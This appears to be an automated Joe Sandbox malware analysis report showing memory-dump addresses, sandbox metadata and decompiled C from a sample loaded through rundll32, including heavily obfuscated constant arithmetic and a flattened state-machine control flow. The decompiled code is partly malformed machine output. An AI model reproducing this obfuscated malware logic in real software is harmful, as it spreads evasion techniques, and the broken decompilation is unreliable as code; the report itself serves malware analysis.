                                                                                                                                                            0x0038c919
                                                                                                                                                            0x0038c919
                                                                                                                                                            0x0038c919
                                                                                                                                                            0x0038c919
                                                                                                                                                            0x0038c91b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038c921
                                                                                                                                                            0x0038c9e2
                                                                                                                                                            0x0038c9e3
                                                                                                                                                            0x0038c9e4
                                                                                                                                                            0x0038c9e9
                                                                                                                                                            0x0038c9ec
                                                                                                                                                            0x0038c9f1
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038c927
                                                                                                                                                            0x0038c92d
                                                                                                                                                            0x0038c9c0
                                                                                                                                                            0x0038c9c1
                                                                                                                                                            0x0038c9c2
                                                                                                                                                            0x0038c9c7
                                                                                                                                                            0x0038c9ca
                                                                                                                                                            0x0038c9cf
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038c933
                                                                                                                                                            0x0038c939
                                                                                                                                                            0x0038c99e
                                                                                                                                                            0x0038c99f
                                                                                                                                                            0x0038c9a0
                                                                                                                                                            0x0038c9a5
                                                                                                                                                            0x0038c9a8
                                                                                                                                                            0x0038c9ad
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038c93b
                                                                                                                                                            0x0038c941
                                                                                                                                                            0x0038c97d
                                                                                                                                                            0x0038c981
                                                                                                                                                            0x0038c986
                                                                                                                                                            0x0038c989
                                                                                                                                                            0x0038c98e
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038c943
                                                                                                                                                            0x0038c949
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038c94f
                                                                                                                                                            0x0038c95b
                                                                                                                                                            0x0038c95c
                                                                                                                                                            0x0038c95d
                                                                                                                                                            0x0038c962
                                                                                                                                                            0x0038c965
                                                                                                                                                            0x0038c96a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038c96a
                                                                                                                                                            0x0038c949
                                                                                                                                                            0x0038c941
                                                                                                                                                            0x0038c939
                                                                                                                                                            0x0038c92d
                                                                                                                                                            0x0038ca5f
                                                                                                                                                            0x0038ca68
                                                                                                                                                            0x0038ca68
                                                                                                                                                            0x0038c9fe
                                                                                                                                                            0x0038ca26
                                                                                                                                                            0x0038ca27
                                                                                                                                                            0x0038ca28
                                                                                                                                                            0x0038ca2d
                                                                                                                                                            0x0038ca30
                                                                                                                                                            0x0038ca32
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038ca00
                                                                                                                                                            0x0038ca06
                                                                                                                                                            0x0038ca5d
                                                                                                                                                            0x0038ca08
                                                                                                                                                            0x0038ca0e
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038ca10
                                                                                                                                                            0x0038ca10
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038ca10
                                                                                                                                                            0x0038ca0e
                                                                                                                                                            0x0038ca06
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038ca34
                                                                                                                                                            0x0038ca34
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: )L$Eh$QGf$Z$,$w)!$}+$%l$i _
                                                                                                                                                            • API String ID: 0-1553751006
                                                                                                                                                            • Opcode ID: 24a842ca848367424d792b2c1ed1d107ee6d6e6c77a466d1125fff4a40fa415b
                                                                                                                                                            • Instruction ID: b19b35f7d0bdfacb135718fe9c209521fa55c27f02ef37cac8b4b0071cfc93a2
                                                                                                                                                            • Opcode Fuzzy Hash: 24a842ca848367424d792b2c1ed1d107ee6d6e6c77a466d1125fff4a40fa415b
                                                                                                                                                            • Instruction Fuzzy Hash: C6A141B28183409FC358DF65D48A80FFBE0BBC5748F015A5DF595A6220D3B5DA08CF92
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 89%
                                                                                                                                                            			E0037D6D8(intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                            				char _v4;
                                                                                                                                                            				char _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				intOrPtr* _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				signed int _v32;
                                                                                                                                                            				signed int _v36;
                                                                                                                                                            				signed int _v40;
                                                                                                                                                            				unsigned int _v44;
                                                                                                                                                            				signed int _v48;
                                                                                                                                                            				signed int _v52;
                                                                                                                                                            				signed int _v56;
                                                                                                                                                            				signed int _v60;
                                                                                                                                                            				signed int _v64;
                                                                                                                                                            				signed int _v68;
                                                                                                                                                            				signed int _v72;
                                                                                                                                                            				signed int _v76;
                                                                                                                                                            				signed int _v80;
                                                                                                                                                            				signed int _v84;
                                                                                                                                                            				signed int _v88;
                                                                                                                                                            				signed int _v92;
                                                                                                                                                            				signed int _v96;
                                                                                                                                                            				signed int _v100;
                                                                                                                                                            				signed int _v104;
                                                                                                                                                            				signed int _v108;
                                                                                                                                                            				signed int _v112;
                                                                                                                                                            				signed int _v116;
                                                                                                                                                            				signed int _v120;
                                                                                                                                                            				signed int _v124;
                                                                                                                                                            				signed int _v128;
                                                                                                                                                            				signed int _v132;
                                                                                                                                                            				signed int _v136;
                                                                                                                                                            				signed int _v140;
                                                                                                                                                            				signed int _v144;
                                                                                                                                                            				signed int _v148;
                                                                                                                                                            				intOrPtr _v152;
                                                                                                                                                            				signed int _v156;
                                                                                                                                                            				intOrPtr _v160;
                                                                                                                                                            				signed int _v164;
                                                                                                                                                            				signed int _v168;
                                                                                                                                                            				signed int _v172;
                                                                                                                                                            				signed int _v176;
                                                                                                                                                            				signed int _v180;
                                                                                                                                                            				signed int _v184;
                                                                                                                                                            				signed int _v188;
                                                                                                                                                            				signed int _v192;
                                                                                                                                                            				void* __ecx;
                                                                                                                                                            				intOrPtr _t400;
                                                                                                                                                            				void* _t407;
                                                                                                                                                            				signed int _t410;
                                                                                                                                                            				intOrPtr _t421;
                                                                                                                                                            				signed int _t423;
                                                                                                                                                            				signed int _t424;
                                                                                                                                                            				signed int _t425;
                                                                                                                                                            				signed int _t426;
                                                                                                                                                            				signed int _t427;
                                                                                                                                                            				signed int _t428;
                                                                                                                                                            				signed int _t429;
                                                                                                                                                            				signed int _t430;
                                                                                                                                                            				signed int _t431;
                                                                                                                                                            				signed int _t432;
                                                                                                                                                            				signed int _t433;
                                                                                                                                                            				intOrPtr _t434;
                                                                                                                                                            				void* _t473;
                                                                                                                                                            				intOrPtr* _t482;
                                                                                                                                                            				signed int _t485;
                                                                                                                                                            				signed int* _t491;
                                                                                                                                                            				void* _t493;
                                                                                                                                                            
                                                                                                                                                            				_push(_a16);
                                                                                                                                                            				_push(_a12);
                                                                                                                                                            				_v16 = __edx;
                                                                                                                                                            				_push(_a8);
                                                                                                                                                            				_push(_a4);
                                                                                                                                                            				_push(__edx);
                                                                                                                                                            				E003820B9(__edx);
                                                                                                                                                            				_v72 = 0xfd05e7;
                                                                                                                                                            				_t491 =  &(( &_v192)[6]);
                                                                                                                                                            				_v72 = _v72 | 0xfdc7c414;
                                                                                                                                                            				_v72 = _v72 ^ 0xfdffc5f6;
                                                                                                                                                            				_t489 = 0;
                                                                                                                                                            				_v128 = 0x159cf;
                                                                                                                                                            				_t421 = 0;
                                                                                                                                                            				_v128 = _v128 + 0x2543;
                                                                                                                                                            				_t485 = 0x8939926;
                                                                                                                                                            				_v128 = _v128 ^ 0xc1c453fb;
                                                                                                                                                            				_v128 = _v128 ^ 0xc1c52ce8;
                                                                                                                                                            				_v188 = 0xc0a375;
                                                                                                                                                            				_t423 = 0x5a;
                                                                                                                                                            				_v188 = _v188 / _t423;
                                                                                                                                                            				_v188 = _v188 + 0xf5e3;
                                                                                                                                                            				_v188 = _v188 + 0xffffba7d;
                                                                                                                                                            				_v188 = _v188 ^ 0x0002d452;
                                                                                                                                                            				_v192 = 0xeb0e91;
                                                                                                                                                            				_v192 = _v192 << 0xb;
                                                                                                                                                            				_v192 = _v192 >> 0xd;
                                                                                                                                                            				_v192 = _v192 | 0x4be38997;
                                                                                                                                                            				_v192 = _v192 ^ 0x4be25280;
                                                                                                                                                            				_v52 = 0x3397e5;
                                                                                                                                                            				_v52 = _v52 ^ 0x345a01ed;
                                                                                                                                                            				_v52 = _v52 ^ 0x346a35aa;
                                                                                                                                                            				_v60 = 0x140ff9;
                                                                                                                                                            				_t424 = 6;
                                                                                                                                                            				_v60 = _v60 / _t424;
                                                                                                                                                            				_v60 = _v60 ^ 0x000ad59a;
                                                                                                                                                            				_v168 = 0x6059cb;
                                                                                                                                                            				_t425 = 0x1a;
                                                                                                                                                            				_v168 = _v168 * 0x7f;
                                                                                                                                                            				_v168 = _v168 / _t425;
                                                                                                                                                            				_v168 = _v168 * 0x21;
                                                                                                                                                            				_v168 = _v168 ^ 0x3ca5e455;
                                                                                                                                                            				_v112 = 0x1e6ccd;
                                                                                                                                                            				_v112 = _v112 << 0xc;
                                                                                                                                                            				_v112 = _v112 + 0xffff3925;
                                                                                                                                                            				_v112 = _v112 ^ 0xe6c2746b;
                                                                                                                                                            				_v44 = 0xb8d15a;
                                                                                                                                                            				_v44 = _v44 >> 0xb;
                                                                                                                                                            				_v44 = _v44 ^ 0x0008fc1e;
                                                                                                                                                            				_v172 = 0x2478d;
                                                                                                                                                            				_v172 = _v172 ^ 0x68bbc6f8;
                                                                                                                                                            				_v172 = _v172 >> 0xc;
                                                                                                                                                            				_v172 = _v172 | 0x6f66efc5;
                                                                                                                                                            				_v172 = _v172 ^ 0x6f64ef75;
                                                                                                                                                            				_v116 = 0x51a99f;
                                                                                                                                                            				_v116 = _v116 | 0x1f129b6c;
                                                                                                                                                            				_v116 = _v116 ^ 0xc118cdce;
                                                                                                                                                            				_v116 = _v116 ^ 0xde47442a;
                                                                                                                                                            				_v132 = 0x216e1a;
                                                                                                                                                            				_v132 = _v132 + 0xffff43fb;
                                                                                                                                                            				_v132 = _v132 ^ 0x7008f7db;
                                                                                                                                                            				_v132 = _v132 ^ 0x702542ff;
                                                                                                                                                            				_v84 = 0xc91edc;
                                                                                                                                                            				_t426 = 0x5e;
                                                                                                                                                            				_v84 = _v84 / _t426;
                                                                                                                                                            				_v84 = _v84 ^ 0x0006a22a;
                                                                                                                                                            				_v164 = 0xa7de11;
                                                                                                                                                            				_v164 = _v164 + 0xffff6841;
                                                                                                                                                            				_v164 = _v164 >> 4;
                                                                                                                                                            				_v164 = _v164 << 3;
                                                                                                                                                            				_v164 = _v164 ^ 0x005f8816;
                                                                                                                                                            				_v108 = 0xdd6066;
                                                                                                                                                            				_v108 = _v108 >> 8;
                                                                                                                                                            				_v108 = _v108 << 8;
                                                                                                                                                            				_v108 = _v108 ^ 0x00d87344;
                                                                                                                                                            				_v92 = 0x21cc88;
                                                                                                                                                            				_v92 = _v92 ^ 0xd81b96af;
                                                                                                                                                            				_v92 = _v92 ^ 0xd8329727;
                                                                                                                                                            				_v96 = 0xbd6d4e;
                                                                                                                                                            				_t427 = 0x26;
                                                                                                                                                            				_v96 = _v96 / _t427;
                                                                                                                                                            				_v96 = _v96 ^ 0x00061825;
                                                                                                                                                            				_v24 = 0x6502ac;
                                                                                                                                                            				_v24 = _v24 << 4;
                                                                                                                                                            				_v24 = _v24 ^ 0x065de4e3;
                                                                                                                                                            				_v56 = 0x642336;
                                                                                                                                                            				_v56 = _v56 + 0xffffd3db;
                                                                                                                                                            				_v56 = _v56 ^ 0x006ffb84;
                                                                                                                                                            				_v68 = 0x348f1;
                                                                                                                                                            				_t428 = 0x55;
                                                                                                                                                            				_v68 = _v68 / _t428;
                                                                                                                                                            				_v68 = _v68 ^ 0x0008f449;
                                                                                                                                                            				_v76 = 0x3c74f1;
                                                                                                                                                            				_v76 = _v76 + 0xffff407e;
                                                                                                                                                            				_v76 = _v76 ^ 0x003b6445;
                                                                                                                                                            				_v88 = 0xc452b0;
                                                                                                                                                            				_v88 = _v88 + 0xffff3a6d;
                                                                                                                                                            				_v88 = _v88 ^ 0x00c8dd7a;
                                                                                                                                                            				_v48 = 0xc68c2;
                                                                                                                                                            				_t429 = 0x57;
                                                                                                                                                            				_v48 = _v48 / _t429;
                                                                                                                                                            				_v48 = _v48 ^ 0x0008f98a;
                                                                                                                                                            				_v100 = 0x631361;
                                                                                                                                                            				_v100 = _v100 | 0x5af5ab8e;
                                                                                                                                                            				_v100 = _v100 ^ 0x5affcbc5;
                                                                                                                                                            				_v148 = 0x1761a;
                                                                                                                                                            				_v148 = _v148 ^ 0xebf93349;
                                                                                                                                                            				_v148 = _v148 >> 4;
                                                                                                                                                            				_v148 = _v148 ^ 0x0eb625e6;
                                                                                                                                                            				_v40 = 0xe5378a;
                                                                                                                                                            				_v40 = _v40 >> 2;
                                                                                                                                                            				_v40 = _v40 ^ 0x003c8b43;
                                                                                                                                                            				_v140 = 0x73545;
                                                                                                                                                            				_t430 = 0x61;
                                                                                                                                                            				_v140 = _v140 * 0x21;
                                                                                                                                                            				_v140 = _v140 / _t430;
                                                                                                                                                            				_v140 = _v140 ^ 0x0002b6d6;
                                                                                                                                                            				_v80 = 0x39d04;
                                                                                                                                                            				_v80 = _v80 >> 4;
                                                                                                                                                            				_v80 = _v80 ^ 0x00009cd0;
                                                                                                                                                            				_v156 = 0x1ba0aa;
                                                                                                                                                            				_v156 = _v156 + 0x716e;
                                                                                                                                                            				_v156 = _v156 << 0xd;
                                                                                                                                                            				_v156 = _v156 ^ 0xb6bcbcaf;
                                                                                                                                                            				_v156 = _v156 ^ 0x34f57f5f;
                                                                                                                                                            				_v20 = 0xda4179;
                                                                                                                                                            				_t431 = 0x27;
                                                                                                                                                            				_t482 = _v16;
                                                                                                                                                            				_v20 = _v20 / _t431;
                                                                                                                                                            				_v20 = _v20 ^ 0x00092493;
                                                                                                                                                            				_v32 = 0x6dc25;
                                                                                                                                                            				_v32 = _v32 >> 0xf;
                                                                                                                                                            				_v32 = _v32 ^ 0x0008149e;
                                                                                                                                                            				_v180 = 0x3ec4dc;
                                                                                                                                                            				_v180 = _v180 >> 5;
                                                                                                                                                            				_t432 = 0x70;
                                                                                                                                                            				_v180 = _v180 / _t432;
                                                                                                                                                            				_v180 = _v180 + 0xffff18e8;
                                                                                                                                                            				_v180 = _v180 ^ 0xfff4c632;
                                                                                                                                                            				_v64 = 0xea19a3;
                                                                                                                                                            				_v64 = _v64 | 0xee52e837;
                                                                                                                                                            				_v64 = _v64 ^ 0xeef909eb;
                                                                                                                                                            				_v28 = 0xcaf9fa;
                                                                                                                                                            				_v28 = _v28 >> 0xe;
                                                                                                                                                            				_v28 = _v28 ^ 0x000e6f4e;
                                                                                                                                                            				_v120 = 0x563e36;
                                                                                                                                                            				_v120 = _v120 >> 0xe;
                                                                                                                                                            				_v120 = _v120 << 5;
                                                                                                                                                            				_v120 = _v120 ^ 0x00027d23;
                                                                                                                                                            				_v176 = 0x87c40f;
                                                                                                                                                            				_v176 = _v176 ^ 0xb401f56c;
                                                                                                                                                            				_v176 = _v176 + 0xffff7429;
                                                                                                                                                            				_v176 = _v176 | 0xf3ec0d69;
                                                                                                                                                            				_v176 = _v176 ^ 0xf7eb47c6;
                                                                                                                                                            				_v184 = 0x47488d;
                                                                                                                                                            				_v184 = _v184 >> 0xf;
                                                                                                                                                            				_v184 = _v184 << 0xf;
                                                                                                                                                            				_v184 = _v184 << 1;
                                                                                                                                                            				_v184 = _v184 ^ 0x0086c0ad;
                                                                                                                                                            				_v136 = 0xb24629;
                                                                                                                                                            				_v136 = _v136 | 0x7ef33f67;
                                                                                                                                                            				_v136 = _v136 ^ 0x7ef17c1c;
                                                                                                                                                            				_v144 = 0xba01aa;
                                                                                                                                                            				_v144 = _v144 | 0x3cf3a1ff;
                                                                                                                                                            				_v144 = _v144 ^ 0x3cf83085;
                                                                                                                                                            				_v124 = 0xbe6d5e;
                                                                                                                                                            				_v124 = _v124 + 0xffff96e9;
                                                                                                                                                            				_v124 = _v124 | 0xcf3d3218;
                                                                                                                                                            				_v124 = _v124 ^ 0xcfb1306a;
                                                                                                                                                            				_v36 = 0xa69a94;
                                                                                                                                                            				_v36 = _v36 + 0xffffed5e;
                                                                                                                                                            				_v36 = _v36 ^ 0x00a0b8ce;
                                                                                                                                                            				_v104 = 0xa8033b;
                                                                                                                                                            				_t433 = 9;
                                                                                                                                                            				_v104 = _v104 / _t433;
                                                                                                                                                            				_v104 = _v104 >> 6;
                                                                                                                                                            				_v104 = _v104 ^ 0x0005e2c3;
                                                                                                                                                            				while(1) {
                                                                                                                                                            					L1:
                                                                                                                                                            					_t434 = _v160;
                                                                                                                                                            					while(1) {
                                                                                                                                                            						_t400 = _v152;
                                                                                                                                                            						while(1) {
                                                                                                                                                            							L3:
                                                                                                                                                            							_t493 = _t485 - 0xa1723c1;
                                                                                                                                                            							if(_t493 > 0) {
                                                                                                                                                            								goto L19;
                                                                                                                                                            							}
                                                                                                                                                            							L4:
                                                                                                                                                            							if(_t493 == 0) {
                                                                                                                                                            								E00388519(_v144, _v124, _t489);
                                                                                                                                                            								_t485 = 0x4b7559b;
                                                                                                                                                            								goto L17;
                                                                                                                                                            							} else {
                                                                                                                                                            								if(_t485 == 0x4b7559b) {
                                                                                                                                                            									return E00388519(_v36, _v104, _t421);
                                                                                                                                                            								}
                                                                                                                                                            								if(_t485 == 0x4ed616e) {
                                                                                                                                                            									_t441 = _v172;
                                                                                                                                                            									_t407 = E003816AF(_v172,  &_v12, _v116, _v132, _t434, _a8, _t421, _v84, _t434,  &_v4, _t434, _v164, _v108, _v92, _v96, _t434, _t434, _v24, _t434, _v56);
                                                                                                                                                            									_t491 =  &(_t491[0x12]);
                                                                                                                                                            									if(_t407 == 0) {
                                                                                                                                                            										L16:
                                                                                                                                                            										_t485 = 0xa1723c1;
                                                                                                                                                            										L17:
                                                                                                                                                            										_t400 = _v152;
                                                                                                                                                            									} else {
                                                                                                                                                            										_t410 = E0038D25E(_t441);
                                                                                                                                                            										_t485 = 0x9a40434;
                                                                                                                                                            										_t400 = _v12 * 0x2c + _t421;
                                                                                                                                                            										_v152 = _t400;
                                                                                                                                                            										_t482 =  >=  ? _t421 : (_t410 & 0x0000001f) * 0x2c + _t421;
                                                                                                                                                            									}
                                                                                                                                                            									_t434 = _v160;
                                                                                                                                                            									_t473 = 0x6a50b97;
                                                                                                                                                            									continue;
                                                                                                                                                            								} else {
                                                                                                                                                            									if(_t485 == _t473) {
                                                                                                                                                            										E00382007(_v72, _v40, _v140, _t434, _v80,  &_v8, _v156, _t434, _t489, _v20);
                                                                                                                                                            										_t485 =  !=  ? 0xd1a593f : 0xb29ddc7;
                                                                                                                                                            										_t400 = E00388F9E(_v32, _v180, _v64, _v28, _v160);
                                                                                                                                                            										_t491 =  &(_t491[0xb]);
                                                                                                                                                            										L30:
                                                                                                                                                            										_t473 = 0x6a50b97;
                                                                                                                                                            										goto L31;
                                                                                                                                                            									} else {
                                                                                                                                                            										if(_t485 == 0x8939926) {
                                                                                                                                                            											_t485 = 0xe60f9b1;
                                                                                                                                                            											continue;
                                                                                                                                                            										} else {
                                                                                                                                                            											if(_t485 != 0x9a40434) {
                                                                                                                                                            												L31:
                                                                                                                                                            												if(_t485 != 0x88fb243) {
                                                                                                                                                            													goto L1;
                                                                                                                                                            												}
                                                                                                                                                            											} else {
                                                                                                                                                            												_t434 = E003742C4(_v88, _a8, _v48, _v188,  *_t482, _v100, _v148);
                                                                                                                                                            												_t491 =  &(_t491[5]);
                                                                                                                                                            												_v160 = _t434;
                                                                                                                                                            												_t473 = 0x6a50b97;
                                                                                                                                                            												_t485 =  !=  ? 0x6a50b97 : 0xb29ddc7;
                                                                                                                                                            												_t400 = _v152;
                                                                                                                                                            												while(1) {
                                                                                                                                                            													L3:
                                                                                                                                                            													_t493 = _t485 - 0xa1723c1;
                                                                                                                                                            													if(_t493 > 0) {
                                                                                                                                                            														goto L19;
                                                                                                                                                            													}
                                                                                                                                                            													goto L4;
                                                                                                                                                            												}
                                                                                                                                                            												goto L19;
                                                                                                                                                            											}
                                                                                                                                                            										}
                                                                                                                                                            									}
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            							L34:
                                                                                                                                                            							return _t400;
                                                                                                                                                            							L19:
                                                                                                                                                            							if(_t485 == 0xaf524c8) {
                                                                                                                                                            								_push(_t434);
                                                                                                                                                            								_push(_t434);
                                                                                                                                                            								_t400 = E00377FF2(0x2000);
                                                                                                                                                            								_t489 = _t400;
                                                                                                                                                            								if(_t400 == 0) {
                                                                                                                                                            									_t485 = 0x4b7559b;
                                                                                                                                                            									goto L30;
                                                                                                                                                            								} else {
                                                                                                                                                            									_t485 = 0x4ed616e;
                                                                                                                                                            									goto L17;
                                                                                                                                                            								}
                                                                                                                                                            							} else {
                                                                                                                                                            								if(_t485 == 0xb29ddc7) {
                                                                                                                                                            									_t482 = _t482 + 0x2c;
                                                                                                                                                            									asm("sbb esi, esi");
                                                                                                                                                            									_t485 = (_t485 & 0xff8ce073) + 0xa1723c1;
                                                                                                                                                            									continue;
                                                                                                                                                            								} else {
                                                                                                                                                            									_t400 = 0xd1a593f;
                                                                                                                                                            									if(_t485 == 0xd1a593f) {
                                                                                                                                                            										E0037DF6F(_v120, _v176, _v128, _v16, _v184, _v136, _t489);
                                                                                                                                                            										_t491 =  &(_t491[5]);
                                                                                                                                                            										goto L16;
                                                                                                                                                            									} else {
                                                                                                                                                            										if(_t485 != 0xe60f9b1) {
                                                                                                                                                            											goto L31;
                                                                                                                                                            										} else {
                                                                                                                                                            											_push(_t434);
                                                                                                                                                            											_push(_t434);
                                                                                                                                                            											_t400 = E00377FF2(0x20000);
                                                                                                                                                            											_t421 = 0xd1a593f;
                                                                                                                                                            											if(0xd1a593f != 0) {
                                                                                                                                                            												_t485 = 0xaf524c8;
                                                                                                                                                            												goto L17;
                                                                                                                                                            											}
                                                                                                                                                            										}
                                                                                                                                                            									}
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            							goto L34;
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            				}
                                                                                                                                                            			}
                                                                                                                                                            0x0037de57
                                                                                                                                                            0x0037de57
                                                                                                                                                            0x0037de11
                                                                                                                                                            0x0037de1f
                                                                                                                                                            0x0037de27
                                                                                                                                                            0x0037de39
                                                                                                                                                            0x0037de3d
                                                                                                                                                            0x0037de41
                                                                                                                                                            0x0037de41
                                                                                                                                                            0x0037de44
                                                                                                                                                            0x0037de48
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037dcd4
                                                                                                                                                            0x0037dcd6
                                                                                                                                                            0x0037dd6a
                                                                                                                                                            0x0037dd91
                                                                                                                                                            0x0037dd9b
                                                                                                                                                            0x0037dda0
                                                                                                                                                            0x0037df40
                                                                                                                                                            0x0037df40
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037dcd8
                                                                                                                                                            0x0037dcde
                                                                                                                                                            0x0037dd31
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037dce0
                                                                                                                                                            0x0037dce6
                                                                                                                                                            0x0037df45
                                                                                                                                                            0x0037df4b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037df4d
                                                                                                                                                            0x0037dcec
                                                                                                                                                            0x0037dd14
                                                                                                                                                            0x0037dd16
                                                                                                                                                            0x0037dd1b
                                                                                                                                                            0x0037dd24
                                                                                                                                                            0x0037dd29
                                                                                                                                                            0x0037dca6
                                                                                                                                                            0x0037dcaa
                                                                                                                                                            0x0037dcaa
                                                                                                                                                            0x0037dcaa
                                                                                                                                                            0x0037dcb0
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037dcb0
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037dcaa
                                                                                                                                                            0x0037dce6
                                                                                                                                                            0x0037dcde
                                                                                                                                                            0x0037dcd6
                                                                                                                                                            0x0037dcce
                                                                                                                                                            0x0037df6e
                                                                                                                                                            0x0037df6e
                                                                                                                                                            0x0037de73
                                                                                                                                                            0x0037de79
                                                                                                                                                            0x0037df22
                                                                                                                                                            0x0037df23
                                                                                                                                                            0x0037df24
                                                                                                                                                            0x0037df29
                                                                                                                                                            0x0037df2f
                                                                                                                                                            0x0037df3b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037df31
                                                                                                                                                            0x0037df31
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037df31
                                                                                                                                                            0x0037de7f
                                                                                                                                                            0x0037de85
                                                                                                                                                            0x0037def6
                                                                                                                                                            0x0037defb
                                                                                                                                                            0x0037df03
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037de87
                                                                                                                                                            0x0037de87
                                                                                                                                                            0x0037de8e
                                                                                                                                                            0x0037dee9
                                                                                                                                                            0x0037deee
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037de90
                                                                                                                                                            0x0037de96
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037de9c
                                                                                                                                                            0x0037deb3
                                                                                                                                                            0x0037deb4
                                                                                                                                                            0x0037deb5
                                                                                                                                                            0x0037deba
                                                                                                                                                            0x0037dec0
                                                                                                                                                            0x0037dec6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037dec6
                                                                                                                                                            0x0037dec0
                                                                                                                                                            0x0037de96
                                                                                                                                                            0x0037de8e
                                                                                                                                                            0x0037de85
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037de79
                                                                                                                                                            0x0037dcaa
                                                                                                                                                            0x0037dca6

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 6#d$6>V$7R$C%$Ed;$nq$udo
                                                                                                                                                            • API String ID: 0-652707834
                                                                                                                                                            • Opcode ID: f1ebdc49b849bf8c904815538ebaa2ee5cbb6585970c67cf9760e8e328c8f8b3
                                                                                                                                                            • Instruction ID: 9426e84c3b9472dc103f886e47143d94ec0d4336c1f25eb6a9f8599f28594d6b
                                                                                                                                                            • Opcode Fuzzy Hash: f1ebdc49b849bf8c904815538ebaa2ee5cbb6585970c67cf9760e8e328c8f8b3
                                                                                                                                                            • Instruction Fuzzy Hash: 5712307250C3809FD379DF25C88AA9BBBE2BBC4344F10891DE5D98A260D7B58949CF53
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 98%
                                                                                                                                                            			E003781B7() {
                                                                                                                                                            				void* _t347;
                                                                                                                                                            				signed int _t350;
                                                                                                                                                            				signed int _t351;
                                                                                                                                                            				signed int _t353;
                                                                                                                                                            				signed int _t355;
                                                                                                                                                            				signed int _t360;
                                                                                                                                                            				signed int _t364;
                                                                                                                                                            				void* _t374;
                                                                                                                                                            				intOrPtr _t407;
                                                                                                                                                            				signed int _t411;
                                                                                                                                                            				signed int _t414;
                                                                                                                                                            				signed int _t415;
                                                                                                                                                            				signed int _t416;
                                                                                                                                                            				signed int _t417;
                                                                                                                                                            				signed int _t418;
                                                                                                                                                            				signed int _t419;
                                                                                                                                                            				signed int _t420;
                                                                                                                                                            				signed int* _t422;
                                                                                                                                                            				void* _t426;
                                                                                                                                                            
                                                                                                                                                            				 *(_t426 + 0x74) = 0xd212a7;
                                                                                                                                                            				 *(_t426 + 0x74) =  *(_t426 + 0x74) ^ 0x52eac678;
                                                                                                                                                            				_t374 = 0xebf23c2;
                                                                                                                                                            				 *(_t426 + 0x74) =  *(_t426 + 0x74) ^ 0x5238d4de;
                                                                                                                                                            				 *(_t426 + 0x20) = 0x60274e;
                                                                                                                                                            				 *(_t426 + 0x20) =  *(_t426 + 0x20) >> 4;
                                                                                                                                                            				_t414 = 0x29;
                                                                                                                                                            				 *(_t426 + 0x34) =  *(_t426 + 0x20) / _t414;
                                                                                                                                                            				 *(_t426 + 0x34) =  *(_t426 + 0x34) + 0x7a4c;
                                                                                                                                                            				 *(_t426 + 0x34) =  *(_t426 + 0x34) ^ 0x00009fd0;
                                                                                                                                                            				 *(_t426 + 0x9c) = 0x5f71eb;
                                                                                                                                                            				 *(_t426 + 0x9c) =  *(_t426 + 0x9c) ^ 0x01156387;
                                                                                                                                                            				 *(_t426 + 0x9c) =  *(_t426 + 0x9c) ^ 0x014a126f;
                                                                                                                                                            				 *(_t426 + 0x1c) = 0x8735e4;
                                                                                                                                                            				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) >> 0xe;
                                                                                                                                                            				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) << 3;
